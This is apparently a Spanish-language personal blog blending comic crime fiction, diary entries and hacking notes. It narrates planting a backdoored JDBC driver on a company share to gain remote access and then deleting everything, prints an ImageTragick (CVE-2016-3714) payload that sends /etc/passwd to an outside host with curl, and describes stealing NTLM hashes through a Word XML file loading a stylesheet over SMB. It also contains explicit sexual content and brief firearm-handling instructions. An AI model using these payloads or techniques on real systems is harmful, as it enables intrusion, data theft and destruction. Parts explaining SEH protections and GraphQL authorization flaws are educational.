Iba tranquilamente manejando sobre Av. Justo Sierra, yendo hacia Baires para comer, cuando de pronto me llegó un mensaje.
Llevaba tiempo que no teníamos una misión, así que inmediatamente me coordine con el equipo para avanzar, lo más pronto posible. Marqué a la persona de mayor confianza.
- Bueno
- ¡Joven!
- ¿Qué cuenta joven?
- Pues nada, aquí con un encarguito
- ¿Qué clase de encarguito? - le cambió el tono de voz, a uno más serio
- Mom me pidió ir a dar unos tehuacanazos
- ¡Huuuuy joven!, creo que eso no se va a poder... pero dame una semana y lo vemos - y me colgó
Hum.. diablos, el elemento más turbio y confiable de esta H. Organización Turbia e Ilegal no estaba disponible; pero al menos espero me traiga un recuerdito. Entonces, le marqué a la segunda opción.
- Bueno - se escuchaba una voz grave y cansada, como de alguien que lleva varios días sin dormir
- ¡Joven!
- ¿Qué pasó?
- ¿Qué haces? - dije yo, intentando ocultar el verdadero motivo de mi llamada
- Viendo el partido
- ¿Cual partido?
- Pues el partido
- Hum.. pero ¿partido de que o qué?
- Hum... ¿de futbol? - algo me decía que no me estaba diciendo la verdad
- ¿En lunes?
- ¿No hay partido los lunes?
- Creo que no
- Ouuuu... - lo había atrapado
- Estas cuidando de la bebé, ¿cierto?
- Si joven, llevó una semana sin dormir y mis tarjetas están en negativo - dijo casi llorando
- Hum... joven, algo me dice que esto no va a funcionar. Básicamente ya no puedo mandarte a ninguna misión turbia e ilegal, me sentiría mal si esa niña se queda huérfana
- ¿Hay una misión turbia e ilegal?, ¿hay bono extra?
- Joven - me pusé serio
- ¿Si?
- Nos vemos en 18 años, joven
- Demonios... mi carrera criminal ha durado poco - y le colgué
Bueno, siempre hay una tercera opción
- Bueno
- ¿Qué tranza? - me respondió con ese barrio iztapalapense que brinda confianza en este tipo de escenarios
- ¡Janey!, ¿qué estas haciendo?
- Noviando con El Chino
- Ouu...
- ¿Necesitabas algo?
- Pozolear a un criminal
- ¿No podemos esperar para mañana? - me dijo, plenamente interesada
- No
- Ouuu.. marcarle a Lalito
- No puede
- ¿Al Becario?
- Tampoco
- Hum... seguro tú podrás resolverlo, siempre puedes. Nos vemos Belindo - y me colgó
Hum… este equipo no está resultando. Así que miré a Shellcode, me miro, nos miramos.. y determiné que yo mismo haría la misión turbia e ilegal, al final, por eso soy el lugarteniente de esta H. Organización Turbia e Ilegal, yo podía hacerlo sólo. Y me puse a trabajar en ello.
Ouu… bueno, tal vez mi única compañera no me acompañaría en la misión.
Me senté frente a la computadora, la miré fijamente… y me di cuenta que no tenía la menor idea de que hacer; así que me di cuenta que en realidad ya estoy muy viejo, y sin equipo no soy nada. Lo único que se me ocurrió es utilizar las únicas técnicas que conozco: chamaquear a alguien.
Por suerte me di cuenta de alguien que trabajaba en ese sitio y que me iba a ser de utilidad.
- ¿Y qué haces allí?
- Ahhh pues... no mucho, me encargo como de todo - eso pasa cuando se es la sobrina del dueño - ¿y tú que haces?
- Nada, aquí aburrido... vamos a comer
- Ok, pero me esperas a que terminé unas cosas
- Si, claro... salgo para allá y de allí nos vamos
Llegué a su oficina y rápidamente empecé a explorar la red. No es una empresa muy grande, así que me encontré ShareEnum que tenían directorios compartidos para varías cosas, incluyendo un “repositorio” de librerías de los programadores. Vi que hacían uso de aplicaciones en Java y las conectaban a los servidores de bases de datos haciendo uso de JDBC, así que, basándome en un paper de un researcher llamado Airman, modifiqué los el driver así:
import java.sql.*;
public class JDBCBackdoorTest {
public static void main(String[] argsStrings){
try{
Connection conn = DriverManager.getConnection("jdbc:blah://bigshot.beer:31337/");
} catch(Exception e) {
e.printStackTrace();
}
}
}
Listo, lo dejé allí y me fui a comer con Priscilla.
Más tarde al llegar a casa me di cuenta que al menos tres desarrolladores habían utilizado el driver para conectarse. Me puse los audífonos y puse la play list especial de hackeo: https://open.spotify.com/playlist/0EfZGNw0JHvoCkNfnMDYAU
¿Qué es lo que hace el driver?, bueno… simplemente ejecuta comandos en la consola, con eso obtuve acceso remoto a la red de la súper empresa segura. Mom no quería más que destruir todo, así que…
Sólo antes de borrar todo y colapsar a todos, quería probar el CVE-2016-3714:
push graphic-context
viewbox 0 0 640 480
fill 'url(localhost"|curl "`curl MyHost/i/?imagewarn --data @/etc/passwd`)'
pop graphic-context
Y…
Ya después de que deje de jugar, entonces si, borré todo…
Querido Diario…
Regresé a casa y me puse a trabajar en el primer assessment que me asignaron, a pesar de que mi profile está pensado para aplicaciones, me dieron un network security assessment 😛 no saqué nada… así que, necesitaba un poco de despejar la mente para poder seguir trabajando.
- ¿Cómo te fue? - me preguntó mientras me pasaba una tarta de pistache y ella se quedaba con la de chocolate; de las que venden en Raphael; frente al Carl's Jr
- Bien, cansado... pero creo que bien; se ven esperanzas
- ¿Qué es eso de [...]? - me preguntó, yo le había comentado en al semana que estaba muy emocionado por eso
- Es un programa privado de bug bounty.... lo de las recompensas
- Te notas muy feliz por eso
- Si - dije pensando - me gusta mucho, me hace sentir que aun sirvo para algo
- ¿No extrañas trabajar en eso?
- Si, moriría de ganas de poder hacerlo nuevamente
- ¿Y luego? - mi miró con esa mirada que tiene de "hazlo"
- Hum... mejor retirarse en la cima - evadí la pregunta
- ¿Qué sientes? - me preguntó. Perfectamente sabía a que se refería
- Duele
- ¿Qué tanto?
- Mucho... duele el pecho, duele todo... es como algo que presiona; duele no poder dar un beso, duelen los brazos al no poder abrazarle... duele no poder siquiera escuchar su risa o su voz
- Hum...
- Hey, basta.. cuéntame... ¿cómo te fue hoy?
- Hum... mejor no, ¿tienes prisa?, ¿vamos al cine?. Vamos a ver Venom, aunque no te gusten las películas de súper héroes
- Vale,... ¡vamos!, pero pediremos nachos; con muchos jalapeños y Pepsi, porque la Coca-cola, yiuck...
Nunca entenderé porque a la gente le gustan las películas de súper héroes; me parecen muy aburridas y predecibles.
- ¿Cual es tu película favorita? - me preguntó mientras íbamos de regreso al coche
- Moulin Rouge - dije
- ¿Por qué?
- Hum... no lo sé; me gusta la historia. Un tiempo le vi tanto que hasta los diálogos me aprendí
- Eres raro - dijo de pronto
- Hum... no sé como tomar eso - le respondí arremendandole
- Nos vemos terrorista cibernético; intenta dormir
- Trataré...
Me quedé fuera de la casa, en un columpió, viendo como Shellcode se peleaba con la manguera del agua… y pensando en lo que tanto me repitieron la semana pasada. Pensé y pensé… y al final recordé que… lo mejor es no planear, sino sólo actuar. Y entonces, lo decidí… lo voy a hacer.
Me acabo apenas de dar cuenta que Symantec adquirió hace muchos años LopthCrack. Poco antes liberaron su versión 7 (yo me quedé en la 6), pero jamás le dieron más continuidad, porque las regulaciones de EEUU prohibieron que pudiese ser comercializada. Y si… me he preguntando: entonces, ¿ahora como le hace el mundo para sacar hashes?, bueno… como ya no hay LC, pensé en pwdump, pero desde pwdump7 no ha habido una nueva versión. ¡Demonios!, hoy todo mundo usa Mimikatz.
¿Ah si?, ¿por qué quiero sacar unos hashes?… bueno, un command injection.
Aunque no lo creas aun se pueden encontrar estas cosas por el mundo… lo complejo de esto es que imagina un escenario con dos servidores, uno de ellos es tu objetivo, pero no está expuesto, el otro es donde está el command injection; y desde allí hay que saltar al interno… pero no tengo ninguna cosa para administrarlo, pero ya cree un usuario de dominio 😛
Lo sé, parece escenario de CTF, pero no… ya sabes como odio los CTF, esto es un coff.. coff.. banco coff.. coff.. es un buen bounty 😛 coff.. coff… ¿para qué?, bueno…
En realidad no, ya casi termina el calor… “termina”, en Mexicalli jamás termina el calor, el invierno es como un verano chilango; pero Shellcode ya pude salir sin miedo. Pero… lo que nos hemos dado cuenta es que no cabe en un coche; y eso que aun es chiquita, así que, ya sé que voy a hacer si gano el bounty.
En ese color azul-morado 😛
Pero.. primero tengo que ver como resuelvo el problema de la administración usando el usuario que cree y jumpeando desde el servidor con el command injection.
Querido Diario… aun tengo cierto atractivo en el mundo….
Aunque ya sabemos que respondí… por otra parte, Querido Diario… ¿los perros podrán ver su reflejo?, y si lo ven… ¿son capaces de saber si el reflejo son ellos o piensan que es otro perro?, los peces no pueden saber que se trata de ellos mismo. Y algo me dice que Shellcode tampoco puede saberlo; acá podemos ver a la señorita heredera de la valentía de todo labrador.
Querido Diario… creo que es momento de tomar un descanso, y terminar al fin el 10mo Doctor. Después de llorar a moco suelto por el capítulo donde el Doctor al fin logra volver a ver a Rose.
Siempre mover archivos dentro de una red es un poco truculento; y ahora con los IDS’s o las herramientas de DPL, puede ser un martirio más grande. Desde montar compartidos que puedan ser leídos desde donde sea, usar el administrador de conexión de DRP que no sé porque ese si deja, pero una conexión de terminal service normal no, y como siempre, el confiable netcat.
Con netcat podemos mover archivos con gran facilidad, con un sólo comando; aunque los IDS’s comúnmente lo detectarán.
Algunos movimientos simples que pueden servirte, no sé… por ejemplo cuando estas echo bolita dentro de un parlamento extranjero, con ganas de secuestrar a la ministra de economía; o meterlo un tiro al primer ministro… pueden ser estos:
Haya por los años del quién sabe cuando que no recuerdo, Microsoft, hizo una modificación interesante a la forma en que se venía llamado a los Exceptions Handlers; en Windows XP SP1.
Los Exception Handlers son una cadena de “objetos” (en realidad no son objetos, pero llevo todo el día intentado recordar como se llaman exactamente… creo que estructuras, pero no recuerdo, me quedé dormido en esa clase xD), en donde se tienen dos elementos, uno es un puntero al siguiente Exception Handler, y otro es el puntero hacia la acción que va a ejecutar ese Exception Handler. Lo que inicialmente hacían los hackers para explotar algún fallo que encontraban, era modificar el salto del EIP disparando un Exception Handler, y a su vez el Exception Handler, te mandaba hacia una dirección modificada. Para hacer eso, se tenía que ingresar directamente a la dirección de memoria del Exception Handler.
Lo que hizo Microsoft para evitar fue esto, es extremadamente sencillo. Cada que ntdll.dll dispará el SEH Chain (el inicio de la cadena de Exception Handlers) se “XORean” todas las direcciones, de esa forma antes de usarse tienen un 0x00000000, es decir.. se borra todo y se inutilizan. Y listo, así de sencillo no es posible alocar una shellcode allí. Después en Windows 2003 server implementaron el mismo cambio.
Microsoft… siempre a la vanguardia en seguridad, muy por encima de todos los S.O.’s…. (escuche un par de linuxeros rabiar y llorar por allí coff.. coff… esa cosa que aun tiene BOF’s es 2018 😛 )
Lo interesante de esto… es que es muy limpio y muy sencillo, y totalmente válido hasta la fecha para evitar la alocación directa de algún payload en una dirección de memoria. Lo que evita un clásico pop ret, ret, ret o un pop %eax o un mov directo, etc..
Querido Diario…
Siempre me ha encantado los cíclidos por su temperamento. Adoraba los Oscares, y siempre quise un FH…
Ya que no pude sacar el bounty por “Authorization bypass” hoy he estado trabajando en otra cosa que parece que tuvo mayor fruto. Y de nuevo es como volver a las viejas tecnologías. En este caso JSON. Cuando recién salió Angular JS todo era horrible, ya no se podía soltar solo Acunetix a lo loco y sacar un montón de juicy bugs, ahora todo cambiaba. De hecho la primer vez que me encontré con JSON fue revisando unas aplicaciones muy raras cuando vivía en un pueblo llamado Aguascalientes.
Pues bien, GraphQL no usa exactamente JSON, pero si envía un chorro (un shoooorro) de información que podría resultado medio sensible. Así que sólo hay que configurar el filtro de Burp Suite para poder cachar cosas como usuarios, sesiones, API keys, etc.
Y coff… coff…
Ouuuu si, te recomiendo que revises la documentación de la API que estes consumiendo (en este caso si es un API), porque así puedes saber el tipo de filtros que debes de configurar en Burp Suite.
Espero ahora si pegue, porque ya necesito algo de dinero, después de que me cobraron el deducible del seguro del Mustang mi tarjeta se ve muy, muy, MUY fea.
Querido Diario, quiero cambiarle de alimento a Shellcode, creo que le falta algo de peso y altura, la veo muy chaparrita. ¿Dónde puedo conseguir en Mexicali este alimento?
… creo que todo mundo cree que soy una mala persona.
Hace un tiempo, en la reunión mensual del Mexicali Open Source Group; conocí GraphQL, que es un proyecto que desarrollo Facebook para poder hacer requests de un solo golpe, que con REST no es posible de hacer. Para eso envían las requests en una estructura definida coff.. coff… en mi opinión muy parecido a lo que se hacía con los WSDL, pero bueno 😛 estamos en el tiempo de las tecnologías hipster.
Básicamente GraphQL está aun muy joven, lo que hace que nuevamente las vulnerabilidades que ya se habían visto hace mucho, vuelvan a aparecer. ¿Y cual es la vulnerabilidad más común que se reportaba en los web services, cuando WSDL o REST?. Así es, problemas en la autorización.
Una request básica usando GraphQL se ve así (ahhh si, yo la ordené para que se viese bonita, porque si tú la sacas directo del HTTP Proxy vas a ver todo en una línea y no lo vas a ver bonito, pero si va así):
POST /accounts/REMOVED/graphql HTTP/1.1{
currentUser {
email
currentAccount {
name
licenseKey
capabilities {
name
}
apmSubscription: subscription(productLine:"apm"){
productLine
}
infraSubscription: subscription(productLine:"infrastructure"){
trialEligibility {
state
}
trial {
endTime
}}}}}
Y el response se ve así:
{"data":{"currentUser":{"email":"redacted@gmail.com","currentAccount":{"name":"This is the account name","licenseKey":"95d24ccefada021a6REDACTED","infraSubscription":{"trialEligibility":{"state":false},"trial":null},"capabilities":[huge list of capabilities],”apmSubscription":{"productLine":"apm"}}}}}
Bueno, bueno.. puede que no te hayas dado cuenta, pero esto que se ve acá es básicamente el response de un administrador; ¡un administrador!, y no un usuario normal. ¿Qué cómo lo sé?, pues porque sé que información da un usuario normal y un administrador, ¿qué como tú lo sabes?… pues he allí el problema.
No lo puedes saber a menos que te encuentres haciendo un assessment tipo DiD o Gray Box con más información; porque sino pues básicamente ves mucha información, pero nada te va a hacer sentido.
Y así… así perdí hoy un bounty de $300 dlls, porque soy incapaz de evidenciar que esta información es sensible, sin que el desarrollar me confirmé un test case de mi request y response.
¡Tecnologías hispter del mal!
Querido Diario… #cachanillas grr.. u.u … 😛
Me duele todo… me siento como si hubiese dormido tre… ouuu… dormí tres semanas. Ahora todo tiene sentido.
En el hospital escuché muchas veces está canción… y me gusta mucho; la tengo en la cabeza todo el tiempo.
No estoy muy seguro si en verdad pasó, pero recuerdo que a las enfermeras les hacía “brrr… brrr…” 😛
Llegó el taxi y metí a Shellcode a su casa. Esta muy acostumbrada a viajar, apenas abrí la reja y ella misma se metió y se acostó.
El aeropuerto ha cambiado mucho, ahora tienen una cafetera bonita, sirven desayunos; pusieron cositas para que no les de Sol a los coches, y hay más compañías de taxis. Apenas subí y me quedé dormido, viajar en primera clase tiene sus ventajas; prácticamente vas acostado.
Bajé del avión y saqué a Shellcode de su casa, estaba emocionada; nunca había visitado esa ciudad. De todas formas creo que lo que más le agradó es que no se quemaba al salir fuera. Tomamos un taxi y nos dirigimos al hotel. En esta ocasión, dado lo peligrosa de la misión, decidí que yo sería el único que se arriesgaría; pero aun así necesitaba de apoyo. Pero ¿quién?, necesitaba a alguien turbio, ilegal y fresco.
- Bueno - ¿Qué pasó joven?
- respondió mientras de fondo se escuchaba que alguien pedía una Coca-cola
- ¿Cómo va la chamaca? - Pues... normal, supongo
- ¿Ya te tomaste fotos de esas cursis en algún lugar pintoresco, pintaste la panza, te tomaron foto con vestimenta de los 20's y un dron volandote en la cabeza?
- No has visto mi foto de perfil, ¿verdad?
- Ouuu - dije sorprendido - ¿fotos cursis en un bosque?
- Una hacienda
- ¿Hubo dron?
- Dos, de hecho
- ¿Quedaste pobre?
- Pues cuando me dieron la cuenta, pensé que venía la hacienda incluída
- Suena mal
- Bastante - dijo pensativo - ¿ahora a quién hay que matar joven?
- Hum... no sé, no estoy seguro de que aun puedas participar en este tipo de proyectos
- Pues no sé joven, ¿me vas a pagar más si mato a alguien?
- No, está ya en tu contrato
- Hum.. entonces preferiría que no.. ya sabes, hay que ser un poco responsables; no podemos andar dejando huérfanos por la vida
- Eso si... tal vez hay que mantenerte un poco vivo... al menos de aquí a Octubre
- ¿Pero no necesitas a alguien para algo turbio?
- Si, pero por ahora, tu sólo te encargaras de los muertos... deja busco a alguien más para los vivos
- Sale joven, si se pone feo me avisas
- ¿Para ayudarme?
- No, por si tengo que mandar flores a alguien en Mexicali
- Ahhh... ok, ok..
Tengo en el fondo un poco de conciencia, así que necesitaba a alguien más de apoyo; pensé en Lalo, pero Tania creo que me va a matar un día. ¿Quién, quién, quién podría ser alguien turbio e ilegal dispuesto a las emociones fuertes de secuestrar, detener una operación truculenta y arriesgar la vida vayan con su perfil?… y entonces los Dioses, bueno en realidad Facebook me dio la respuesta.
- Bueno - ¡Paoooooooooooooola!
- ¡Belindoooooooooooo! - #tienelaactitud
- ¿Qué estas haciendo?
- Pues.. ya sabes, acá trabajando arduamente arduo - Diablos, todos tienen mis muletillas... han aprendido lo peor de mi
- Hum... - [inserte aquí emoticon pensante del wassab] - ¡Paola!, ¿quieres ser parte de un proyecto turbio e ilegal en donde probablemente todo salga mal, nos golpeen, seamos secuestrados, torturados, pasemos emociones fuertes de las malas, todo salga mal y tengamos que hacernos bolita esperando que alguien nos rescate?
- Obvii... turbia es mi segundo nombre e ilegal mi apellido
- Bien, ya estas... te acabo de mandar a tu correo un boleto de avión, haz una maleta sólo con cosas necesarias y te veo en el aeropuerto a las 10am
- Va
- Psss va
- Oye - me interrumpió antes de colgar
- ¿Qué? - ¿No debiese de avisarle a Bytevik primero?, por si me tiene asignado algo
- Hum... naaaaah... tu dile que estas trabajando arduamente, no se va a dar cuenta
- Vale, deja pongo a mi remplazo a trabajar
- ¿Al Becario Fresa?
- No, a otro mejor
- Ok, te veo en un rato
- Va
Me puse a ver Doctor Who mientras esperaba a Paola.
A las 10am tomé un taxi al aeropuerto y me dispuse a esperar. Supuse que como sólo empacaría sus cosas más necesarias, saldría rápido; pero pasó más de una hora y no salía. Justo cuando ya iba a marcarle la vi llegando con dos maletas enormes.
- Holii - me le quedé viendo
- ¿Y esas maletas?
- Ahhh si, joven, tuve un problema.. ¿me puedes facturar $800?, tuve que comprar dos sobre pesos
- Te dije lo más indispensable
- Ya sé... pero ya no me cupo más; espero con esto baste
- Ok... - [inserte monito pensante del wassab aquí]
Tomamos el taxi de ida al hotel y al llegar le di su llave.
- Que elegancia la de Francia
- Tenemos $100k dlls de presupuesto para la tarea, es la ventaja de que el crimen si paga
- ¿Y los podemos gastar en lo que sea? - pregunto con cara de "ya se armo la fiesta"
- Si, en lo que sea... es dinero sucio, no se factura, no sé reporta, no nada... y si necesitamos más, pues... teoricamente no necesitamos, pero puedo pedir más
- Es momento de ir por mujerzuelas y alcohol del caro
- #karen
- #melissa
- #gabriela
- #tatuada
Después de que dejamos de babear bajamos al looby del hotel, y pedimos que nos llevasen el catálogo de coches para rentar.
- ¡Belindo! - en ese momento me arrepentí de haberla seleccionado - eres el H. Lugarteniente de esta H. H. H. Organización Turbia e Ilegal, necesitamos este
- Diablos... ok - y le casi ordené al patré - uno de estos en estándar y en color rojo si tiene
- Caballero, sólo lo tenemos en blanco y negro
- Negro está bien
Y nos fuimos al bar más caro que encontramos. Algo me dice que esa noche ya no trabajaríamos, pero creo que Pao tenía razón, necesitábamos un poco de descanso antes de empezar.
Al llegar al bar Pao le dijo al mesero que le llevase lo más caro que tuviese en la carta y le llevo una botella de algo raro; yo pedí un bourbon, como persona normal.
- Bien, ¿qué tenemos que hacer? - era cierto, ni siquiera le había dicho
- Tenemos que entrar al equipo de alguien, ubicarlo, sembrarle evidencia y hacer una llamada
- ¿Es un tipo malo? - Muy malo - ¿Qué tan malo?, ¿como el que engaña a su esposa con prostitutas?
- Hum.. nah, otro tipo de malo; ese no era malo, sólo pervertido. Este tipo ha desaparecido a unas 25 personas directamente, e indirectamente ya es incontable. Ha llenado esta ciudad de fosas con muertos por todos lados
- Belindo, eso se escucha peligroso
- Si, pero... tú no te preocupes; yo me encargo de las cosas feas, sólo necesito apoyo para las operaciones
- Más te vale, aun soy muy joven para morir
Dejamos de hablar del trabajo y entonces le vimos pasar, Paola inmediatamente se dio cuenta, rubia, güera, alta y pechugona. Así que fue por ella y cuando ya estaba con nosotros bebiendo como si fuésemos grandes amigos me dejó sólo.
- Tú amiga creo que te abandonó
- Si, es mala
- ¿Mala? - preguntó mientras se empezaba cada vez a pegar más a mi
- Si, bueno no... le gusta hacerme sufrir
- Hum... ¿te hago sufrir?
- Aun no sé
- ¿Y quieres averiguar? - dijo mientras me pasaba su vaso vacío, levante a mano y le hice la seña al barman para que le sirviese lo mismo
- No lo sé... aun no estoy convencido
- ¿A qué te dedicas?
- Es complejo... soy fontanero
- ¿Un fontanero gana suficiente para traer un coche de $2 millones de pesos?
- Sabes mucho de carros
- No, sé mucho de hombres
- Ouuuu... entonces dime, señorita experta - nuevamente le pedí al barman un bourbon, iba a necesitas mucho alcohol - ¿a qué me dedico?
- Podrías ser escritor
- Lo soy
- Entonces endúlzame los oídos de tus versos
Me levanté y dejé el vaso y jalé la botella hacia mi; dejé unos billetes sobre la mesa y la tome por la cintura. Al ir rumbo a la salida me encontré a Paola y le dejé las llaves.
- Diviértete - me dijo Paola mientras me guiñaba el ojo
Llegamos a mi habitación, y parece que ella no iba a platicar.
- ¿Qué te gustó de mi? - quería jugar
- Tus pupilas al dilatar - por el DHC que se había tomado de camino - funden tus sueños en un cálido mar, dentro del agua; toda mi frialdad se acaba - le dije mientras entrábamos en el jacuzzi
- ¿Ajá?
- Son mis manos para tocarte, es mi boca para mostrarte; que soy de tu piel un depredador al vuelo - la botella de bourbon ya no era relevante, tampoco la ropa, ni siquiera que estuviésemos en la terraza del hotel
La saqué del jacuzzi, buscando llevarle a la cama; pero ella me derribo a mitad de la habitación cayendo ambos al suelo.
- Sentir tu peso un frenesí, tus caderas, tus piernas sobre mi... tu cintura sacude el mar; llego al fondo de tu intimidad - río - abro los ojos para entender, que tu sudor en la sal que bebo. La diosa que eres, el rostro angelical que tienes, como luces flotando al aire, por galaxias alucinantes, podemos viajar y luego converger la explotar.
- No eres escritor, eres pésimo
- ¿Que soy? ... - no respondió, las palabras pasaron un rol secundario durante la noche.
Como a las 5am sentí como se levantó, y con la escasa luz de la ventana vi como se vistió y se fue; unos minutos más tarde escuché risas y la puerta de Pao cerrando. Fue entonces que estuve sólo, que me desperté para prepararme para lo que venía.
Mi idea para resolver el problema era sencilla. Anteriormente había intentado usar Bad-PDF para hacer un robo de hashes NTLM; pero el problema es que eso depende mucho de la versión de Acrobat Reader que use la víctima y reduce la probabilidad de éxito, en este caso lo que quise hacer fue utilizar algo que me permitiese ser más flexible; un documento de XML que mandase llamar una hoja de estilos XSL por SMB; ¿y cuales son los documentos de XML más utilizados y “estándares”?, los documentos de MS Office.
Un documento de XML básico se puede crear con Word. Por ejemplo algo así.
Para poder analizarlo, lo más sencillo es guardarlo en formato XML directamente, aunque también se podría cambiar sólo la extensión, o abrirlo desde un editor de texto.
Hay que poner especial interés en el tag: <?mso-application progid=”Word.Document”?>
progid es un identificador, el cual es cargado por el XML handler de Microsoft, el cual procesa el tag mso-application que esta identificado por el prodid. Por lo cual MSOXMLED.EXE puede ser lanzado directo para llamar un archivo XML con estructura de Office, tipo:
MSOXMLED.EXE /verb open "C:\Users\user\Desktop\word.xml"
Sin embargo, esto mismo puede pasar si un usuario le da doble click, usualmente desde Windows 10 lo carga office al momento de que Windows detecta que es un archivo de Office, aunque venga como XML; es la forma en que los archivos de LibreOffice u OpenOffice llegan a funcionar moviendo todo el formato, pero si no está definido un programa especial para cargarlo muestra el XML Handler de Office. Que lo que hace es mostrar.. tarán, nuestro archivo de Word inicial.
¿A qué voy con todo esto?, que precisamente no importa que haya en las tags dentro del XML, si la estructura es reconocida como de Office va a manejarlo el XML Handler de Office.
Lo siguiente es modificar entonces el archivo de XML para mandar a cargar la hoja de estilos, y entonces capturar el hash de NTLM. Ojo, es importante mencionar que esto tiene que ser desde la red interna.
Aquí básicamente lo que he hecho son dos cosas, por un lado cargar el archivo XSL pero también agregé el tag <mso-application para forzar que el handler no se vaya a equivocar, y me reconozca el archivo como un XML de Word.
Lo siguiente que hago es ejecutar Impacket, una herramienta de Core Security que me permite mantener un servidor arriba donde capturaré los hashes:
Ahora sólo falta esperar a que la persona de doble click al archivo, sin embargo ¿cómo iba a lograr esto?, bueno; aquí viene la parte turbia e ilegal de todo esto.
Después de que dejé lista la prueba me fui a la cama, abracé a Shellcode y nos quedamos dormidos.
A la mañana despertamos y nos levantamos para desayunar. Ambos pedimos huevos revueltos y entonces le dije a Pao que me acompañará a mi habitación.
- ¡Belindo! - y puso ojos de huevo cocido - creo que ya tuviste bastante señorito
- -_-U es para que te expliqué
- ¡Ahhh! ok, entonces vamos
Al subir Shellcode le movió la cola y le empezó a ladrar, a Pao sela ganó con eso; y que bueno, porque ella tendría que cuidarle mientras yo iba a infiltrarme en el objetivo.
- Bien, este el plan... yo me voy a infiltrar y voy a hacer que ellos tengan los archivos y los abran, cuando pasé eso voy a capturar el hash y lo vas a ver a través de una cámara web; tu tienes que pasar el hash a un TXT y romperlo. No puedes subirlo a la nube, así que lo tendrás que hacer en uno de nuestros servidores conectandote a través de la VPN.. tienes que hacerlo lo más rápido posible, porque no puedo pasar mucho tiempo allí o me van a matar. ¿Hecho?
- Joven... cuando dices matar, es figurativo ¿verdad?
- Nou - ¡Ahhhh ok!, vale... bueno... si
- Estoy poniendo en tus manos mi vida
- Eso suena a mucho compromiso joven
- Bienvenida a la vida turbia e ilegal
- Rayos
Fui a la caja fuerte y saqué una cajita
- Ahora pasemos a lo más feo
- ¿Hay algo más feo?
- Si... - y saqué mi Colt - No tienen como llegar aquí, tú eres fan de Tor así que úsalo... pero por si acaso - y entonces le pusé el arma al frente - seguro, manual, semi automático, automático; jalas y bala en la recámara, sueltas cartucho listo; ¿se acaba? quitas seguro, tirón y cambias; vuelves a jalar, cartucho listo y pasas a recámara... tomas fuerte, mano completa en el mango,, intenta fiarte de tu ojo izquierdo y no cierres los ojos al disparar; pon el brazo duro porque te va a dar un tirón en el hombro. ¿Dudas?
- Joven, ¿crees que pueda haber relevo?, porque esto ya no me esta gustando
- Los relevos posibles no están disponibles, pero no te preocupes, no va a pasar nada, tú confía en mi, tengo mucha suerte
- Rayos, no sé... Lalo me ha dicho que jamás confié en ti
- ¿Cual de los dos?
- Hum... de hecho los dos
- Ouuuu... esos muchachos son muy sabios
Estaba todo listo. Abracé a Shellcode y le di una chuletita y me despedí de Pao, haciendo mi típico gesto de “relaaaaajate”.
Subí al súper coche deportivo y me fui al primer Office Depot que encontré para comprar una memoria y pasar los archivos, y entonces le marqué.
- Bueno
- vendetta
- Faustino
- ¿Estas listo?
- Si
- Bien, tenemos el contacto hecho... llegas, te sientas con ellos, platicas y entonces haces lo que tengas que hacer. Una vez que tengas el acceso, siembras la evidencia y ya que este evidencia y objetivo ubicado, damos el pitazo. ¿Te late?
- Ok, estoy en un Office Depot, mándame a tu gente para descargar la evidencia a mi computadora y llevarla cifrada, por si me revisan
- Mira atrás - giré y allí estaba ese chamaco, no me ha entendido
- Vale
- vendetta
- ¿Qué?
- Cuídate cab$%&, no vayas a fallar, me caes bien, eres a toda ma$%&
- Yo jamás fallo
Quité los seguros de la puerta y entró Mauricio, como siempre iba con su suadera Abercrombie, su gorra y con cara de lelo.
- ¿Qué te dije? - le pregunté mientras le metía un sape - te dije que te alejaras de esto pen$%&... no pin$%& mam$%& aunque sea estudia en la UNITEC, en la UVM, pero deja esto
- No puedo, tengo hermanos y familia... tu naciste rico, con oportunidades, pero yo no
- Pfff rico... yo soy de la 20 de Noviembre idiota
- No te creo
- Olvídalo... a ver, ¿qué me traes? - y le extendí la mano para que me diese la memoria; la tomé y la puse en el adaptador de Apple y la abrí en una maquina virtual. Yo jamás confiaría en algo que me de gente de Mercado - ¿qué es esto?
- Estados financieros, relacionados con las aportaciones que le dieron al nuevo #1
- Pensé que él estaba con Mataulipas
- Con todos, excepto los del jitomate
- ¿Esos son del #1 actual?
- Si
- Me asusta todo lo que saben ustedes - copie la información a una partición cifrado con VeraCrypt y le regresé la memoria - ¿qué tan seguro ves esto?
- ¿Le soy sincero?
- Si
- Con el nuevo #1 todo se ve muy mal, cada vez estamos teniendo más trabajo, y eso que el jefe-jefe no se lleva bien con el fondeador del nuevo #1
- Hum... ¿te puedo pedir un favor?
- Lo que quiera señor, a la orden
- Ten esta dirección; si algo me pasa, mandas estas allí... y esta carta; y no la leas ni se la muestres a tu jefe cab$%& o yo mismo te hago el agujero en la panza o alguien de mi equipo
- No señor
- Oye - ¿Si señor?
- En serio, busca otro trabajo, una escuela, de menos ponte a desbloquear celulares de nuevo en la plaza - me miro con una mirada que yo también conozco, esa mirada de "no me gusta, pero tengo que"... yo conocía esa sensación de sobra - largo mocoso... te veo mañana
- Suerte señor
Mauricio se bajó el coche. Yo me quedé aun un rato en el estacionamiento; sentía mi corazón gritar dentro de mi pecho. Y esa sensación de extrañesa, recordar esos días llenos de felicidad, de besos, de abrazos, de juegos y risas… y jamás haber pensado que estaría sentado a unos minutos de hacer lo que iba a hacer.
Manejé hasta donde me interceptarían… todo rumbo a la salida a la carretera a la Ciudad de México. Pasé toda la parte urbana de la ciudad y el Waze me empezó a advertir que empezaban a convertirse en caminos de terraceria, cuando intenté subir una pendiente me di cuenta que Pao había escogido una pésima opción de coche, necesitaba una camioneta para esto. Entonces llegué a un punto en donde dos tipos con sombrero me detuvieron.
- Eh.. parate 'ay
- Vengo a ver a su patrón
- ¿Tú qué vas a saber del patrón?
Con esta gente había que ponerse rudo… o de menos aparentar. Me bajé del coche apuntando y gritando.
- Mira hijo de tu pi$%& mad$%&, no me voy a poner a hablar con un pelagatos.. avísale a tu patrón que estoy aquí sino quieres que le lleve tú pin$%& c$%& lleno de plomo - el tipo me miro con ganas de matarme, pero la duda le lleno, sabía que alguien que habla así es porque tiene mucho poder... hizo un movimiento con la mano y me dejó pasar
Seguí manejando hasta que de pronto apareció un tipo montado a caballo que me fue marcando el paso para llegar. Paramos a la entrada de un rancho enorme que me sorprendió estuviese allí, me hicieron con señas que bajase y entonces me revisaron por todos lados, ¡por todos lados!…. una vez que se dieron cuenta que no tenía nada, me pidieron poner mi arma en una caja y me pasaron. Les indique que quería entrar con mi laptop, la sacaron de la maleta y me la dieron. Alcancé sólo a tomar el cargador y les dije “por las dudas”, y cuando me iba tomé el adaptador de USB y el cuadrito del celular.
